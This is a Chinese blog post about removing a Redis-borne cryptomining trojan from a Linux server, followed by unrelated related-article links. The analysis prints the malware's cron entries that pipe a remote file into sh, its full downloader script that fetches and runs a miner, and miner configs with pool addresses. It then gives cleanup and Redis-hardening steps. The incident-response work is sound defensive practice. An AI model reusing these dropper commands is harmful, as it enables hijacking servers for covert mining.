Redis漏洞挖矿木马清除
来源:互联网 发布:二维数组初始化 memset 编辑:程序博客网 时间:2024/05/16 02:06
最近两天服务器莫名的cpu100%报警,一看有个/tmp/systemd-logind进程一直占有cpu资源:
htop查看,F6选择CPU
/tmp/systemd-logind -c /tmp/logind.conf -u xxxxxxxxxxxx
查看conf文件
1 {
2 "url" : "stratum+tcp://212.129.44.156:80",
3 "url" : "stratum+tcp://62.210.29.108:80",
4 "url" : "stratum+tcp://212.129.46.191:80",
5 "url" : "stratum+tcp://212.129.44.155:80",
6 "url" : "stratum+tcp://212.83.129.195:80",
7 "url" : "stratum+tcp://212.129.44.157:80",
11 "pass" : "x",
12 "algo" : "cryptonight",
13 "quiet" : true
14 }
最简单作法,杀进程,删除文件,看下如何。
killall systemd-logind & rm -rf /tmp/systemd-logind /tmp/logind.conf
不过一个小时后,又报警,说明它会自动启动,查看crontab
crontab -l
45 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh
45 * * * * curl http://91.230.47.41/common/logo.jpg|sh
每个整点45分,启动下载然后执行脚本。
这次要谨慎一下,先通过Iptable将这个下载地址给禁止了
iptables -A INPUT -s 91.230.47.41 -j DROPiptables -A OUTPUT -d 91.230.47.41 -j DROPiptables -A INPUT -s 91.230.47.41 -j DROPiptables -A OUTPUT -d 91.230.47.41 -j DROP
自动下载上述脚本,分析其行为:
curl http://91.230.47.41/common/logo.jpg > miner.sh
1 #!/bin/sh
2 rm -rf /tmp/index_bak.*
3 rm -rf /tmp/httpd.conf.*
4 rm -rf /tmp/httpd.conf
5 pkill -f stratum
6 pkill -f "/tmp/apache"
7 pkill -f "/tmp/httpd.conf"
8 ps auxf|grep -v grep|grep "/tmp/apache"|awk '{print $2}'|xargs kill -9
9 ps auxf|grep -v grep|grep "/tmp/httpd.conf"|awk '{print $2}'|xargs kill -9
10 ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
11 ps -fe|grep 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R |grep -v grep
12 if [ $? -ne 0 ]
13 then
14 echo "start process....."
15 chmod 777 /tmp/logind.conf
16 rm -rf /tmp/logind.conf
17 curl -o /tmp/logind.conf http://91.230.47.41/common/logind.conf
18 wget -O /tmp/logind.conf http://91.230.47.41/common/logind.conf
19 chmod 777 /tmp/systemd-logind
20 rm -rf /tmp/systemd-logind
21 cat /proc/cpuinfo|grep aes>/dev/null
22 if [ $? -ne 1 ]
23 then
24 curl -o /tmp/systemd-logind http://91.230.47.41/common/systemd-logind
25 wget -O /tmp/systemd-logind http://91.230.47.41/common/systemd-logind
26 else
27 curl -o /tmp/systemd-logind http://91.230.47.41/common/systemd-logind_na
28 wget -O /tmp/systemd-logind http://91.230.47.41/common/systemd-logind_na
29 fi
30 chmod +x /tmp/systemd-logind
31 nohup /tmp/systemd-logind -c /tmp/logind.conf -u 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R >/dev/null &
32 else
33 echo "runing....."
34 fi
35
大意如下:
先将自己的之前的进程杀掉, 如果没有找到自己的木马进程,则下载配置文件logind.conf ,添加为木马执行权限,根据CPU是否支持aes加密指令集下载不同的木马本体,然后执行它
了解了木马的原理,好办了。
先把下载木马的ip封了,然后把木马cron任务清除,将本体删除。
先将之前的清除过程再执行一次,再把crontab里任务清除.
再查看其它重要的地方:
1. /etc/, /user/etc/, /user/local/etc
找到一个:/usr/local/etc/minerd.conf,查看内容
-B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 448J3JccPv4D8XWvFJ6wFwLZuVtYdQSSFKoKnLS5pU4EL6SfsGvg4AAHqNeLK8LguDFpJtcFJ6ZWr1NAbuEVmHEz5JftEox -p x
删除它。
2. /etc/ssh/
顺便查看下该目录下有没有非法的ssh授权访问,如果有的话,删除。
3. 清除其它残余变体
ps aux 查看可疑进程
root 16612 1 0 03:59 ? 00:00:08 ./get
root 16691 1 0 04:00 ? 00:00:00 /usr/bin/.sshd
先看.ssd
# ls /usr/bin/.sshd -l
-rwxr-xr-x 1 root root 1223123 Apr 8 04:00 /usr/bin/.sshd
# file /usr/bin/.sshd
/usr/bin/.sshd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
是今天凌晨创建的,肯定有问题,删除并kill掉
再来看./get,无法查看到它的路径,通过进程信息来反查
#cd /prod/16612/
#ll exe
lrwxrwxrwx 1 root root 0 Apr 8 13:38 exe -> /usr/local/apache-tomcat-8.0.38/bin/get
查看get信息
# ll
total 2000
-rw-r--r-- 1 root root 32279 Oct 7 2016 bootstrap.jar
-rw-r--r-- 1 root root 15026 Oct 7 2016 catalina.bat
-rwxr-xr-x 1 root root 22443 Oct 7 2016 catalina.sh
-rw-r--r-- 1 root root 1647 Oct 7 2016 catalina-tasks.xml
-rw-r--r-- 1 root root 24283 Oct 7 2016 commons-daemon.jar
-rw-r--r-- 1 root root 204944 Oct 7 2016 commons-daemon-native.tar.gz
-rw-r--r-- 1 root root 2040 Oct 7 2016 configtest.bat
-rwxr-xr-x 1 root root 1922 Oct 7 2016 configtest.sh
-rw-r--r-- 1 root root 73 Apr 8 04:00 conf.n
-rwxr-xr-x 1 root root 7888 Oct 7 2016 daemon.sh
-rw-r--r-- 1 root root 2091 Oct 7 2016 digest.bat
-rwxr-xr-x 1 root root 1965 Oct 7 2016 digest.sh
-rwxrwxrwx 1 root root 1223123 Apr 5 23:57 get
drwxr-xr-x 2 root root 4096 Nov 29 10:01 logs
-rw-r--r-- 1 root root 3430 Oct 7 2016 setclasspath.bat
-rwxr-xr-x 1 root root 3547 Oct 7 2016 setclasspath.sh
-rw-r--r-- 1 root root 2020 Oct 7 2016 shutdown.bat
-rwxr-xr-x 1 root root 1902 Oct 7 2016 shutdown.sh
-rw-r--r-- 1 root root 2022 Oct 7 2016 startup.bat
-rwxr-xr-x 1 root root 1904 Oct 7 2016 startup.sh
-rw-r--r-- 1 root root 40853 Oct 7 2016 tomcat-juli.jar
-rw-r--r-- 1 root root 391853 Oct 7 2016 tomcat-native.tar.gz
-rw-r--r-- 1 root root 4057 Oct 7 2016 tool-wrapper.bat
-rwxr-xr-x 1 root root 5061 Oct 7 2016 tool-wrapper.sh
-rw-r--r-- 1 root root 2026 Oct 7 2016 version.bat
-rwxr-xr-x 1 root root 1908 Oct 7 2016 version.sh
前几天新创建的文件,它和.ssd文件大小一样,并且它创建日期最早,很有可能是感染源,隐藏在了tomcat的目录下。
通过阿里云的木马查杀,发现了更多的变种:
https://help.aliyun.com/knowledge_detail/38083.html
PS:文件修改监控工具:auditctl
## 木马原因
估计是redis漏洞导致:
http://blog.jobbole.com/94518/
下面是解决办法和清除工作
1. 修复 redis 的后门,
- 配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
- 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
- 配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
- 好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
参考资源:
http://www.itnpc.com/news/web/1473388548113704.html
http://www.itnpc.com/news/web/1472040058107584.html
http://www.cnblogs.com/zhouto/p/5680594.html
- Redis漏洞挖矿木马清除
- 木马清除
- 清除wnTKYg 挖矿工木马的过程?
- 清除木马心得
- 清除落雪木马
- ALASTART.EXE木马清除
- 清除木马文件
- 木马查找清除攻略
- 木马清除小技巧
- 数据库木马的清除
- Linux minerd木马清除
- Linux清除木马minerd
- CentOS7清除wnTKYg木马
- CentOS7清除wnTKYg木马
- CentOS7清除wnTKYg木马
- 清除wnTKYg 这个挖矿工木马的过程讲述
- 清除wnTKYg 这个挖矿工木马的过程讲述
- 清除wnTKYg 这个挖矿工木马的过程讲述
- 如何检查补丁/软件下载的完整性? [视频] (文档 ID 2016783.1)
- jquery 用于操作动态元素的delegate/on方法
- java字符串数组取别名,冒泡排序
- HDU-3038 How Many Answers Are Wrong
- 用Python开始机器学习(1:配置windows平台)
- Redis漏洞挖矿木马清除
- 位运算入门
- 每日一题 No.11 有颜色的控制台
- 自定义联系人头像显示第一个字符
- vfio中的container 和group的操作
- macOS
- 用Python开始机器学习(2:决策树分类算法)
- 可滑动的横向时间轴
- spring的@Transactional注解详细用法